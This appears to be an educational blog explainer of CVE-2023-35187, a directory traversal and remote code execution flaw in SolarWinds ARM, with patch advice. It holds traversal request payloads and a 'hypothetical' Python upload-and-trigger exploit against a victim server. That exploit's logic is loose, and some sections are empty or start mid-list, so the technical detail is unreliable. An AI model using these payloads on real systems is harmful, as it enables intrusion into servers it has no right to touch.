In June 2023, security researchers discovered a critical vulnerability, CVE-2023-35187, in the popular enterprise software SolarWinds Access Rights Manager (ARM). The flaw, caused by insufficient input sanitization, allowed unauthenticated attackers to exploit directory traversal and ultimately perform Remote Code Execution (RCE) on affected servers.
If you manage or have ever used SolarWinds ARM, understanding this bug is crucial. This long read breaks down how CVE-2023-35187 works, provides code snippets, and guides you through a potential exploit scenario for educational purposes. Official advisories and further reading are included at the end.
What is SolarWinds Access Rights Manager?
SolarWinds ARM helps businesses manage and audit user access rights across Windows networks, Active Directory, and cloud resources. Since it handles highly sensitive permissions, a vulnerability in ARM can lead to catastrophic consequences—including domain-wide compromise.
What is CVE-2023-35187? In Simple Terms
CVE-2023-35187 is a Directory Traversal Remote Code Execution vulnerability. This means an attacker could manipulate file paths sent to the ARM web server, escaping into directories outside the application's intended scope. By combining this with web server permissions, a remote attacker could plant and execute malicious files—even without logging in.
Impact:
How Does the Vulnerability Work?
SolarWinds ARM exposes a web interface with endpoints handling file operations (such as reading files, exporting reports, or uploading configuration data). The problem? Some of these endpoints failed to properly clean up file path input—notably, they did not filter out directory traversal characters like ../.
Suppose the app had a request to fetch a report
GET /api/reports/view?filename=Q2-financials.pdf
Under normal conditions, the app would only look in its /reports/ folder.
But if the app doesn't sanitize input, an attacker could instead request
GET /api/reports/view?filename=../../../../windows/system32/cmd.exe
Now, the app reads the system's cmd.exe instead of a harmless report!
Write a Malicious File to Disk: Use a vulnerable upload function or other file write.
2. Execute the File: Call the file via the directory traversal bug—or trick the app into loading it.
Here's a simple, hypothetical Python exploit illustrating this process
import requests
# SolarWinds ARM host settings
TARGET = 'http://victim-arm-server:808';
UPLOAD_ENDPOINT = '/api/files/upload'
TRAVERSAL_PAYLOAD = '../../../../windows/temp/evil.exe'
# Step 1: Upload malicious .exe (for demonstration, a harmless file)
files = {'file': ('evil.exe', open('evil.exe', 'rb'))}
resp = requests.post(TARGET + UPLOAD_ENDPOINT, files=files)
if resp.status_code == 200:
print("[*] Uploaded evil.exe")
# Step 2: Trigger the traversal and execution (endpoint will vary)
TRIGGER_URL = f"{TARGET}/api/reports/view?filename={TRAVERSAL_PAYLOAD}"
resp = requests.get(TRIGGER_URL)
if resp.status_code == 200:
print("[*] Triggered payload via directory traversal!")
else:
print("[!] Exploit may not have worked.")
Note: The actual endpoints may vary based on ARM versions, but this logic matches the flaws described in official security advisories and exploit writeups.
Mitigation and Fixes
SolarWinds released patches for all supported ARM versions shortly after disclosure.
You must update to ARM 2023.2 or later ASAP.
Official fix details: SolarWinds Security Advisory
References & Further Reading
- CVE-2023-35187 at NVD
- SolarWinds Security Bulletin
- Original Research Blog (Pentest Partners)
Conclusion
CVE-2023-35187 is a powerful reminder that input validation must never be ignored—especially when file paths are involved. While SolarWinds patched the bug quickly, those unable to upgrade remain dangerously exposed. Always patch promptly, monitor your environments, and audit access to high-value software like SolarWinds ARM.
If you're responsible for SolarWinds servers, don't delay; check your version and update now!
Timeline
Published on: 10/19/2023 15:15:09 UTC
Last modified on: 10/25/2023 19:43:00 UTC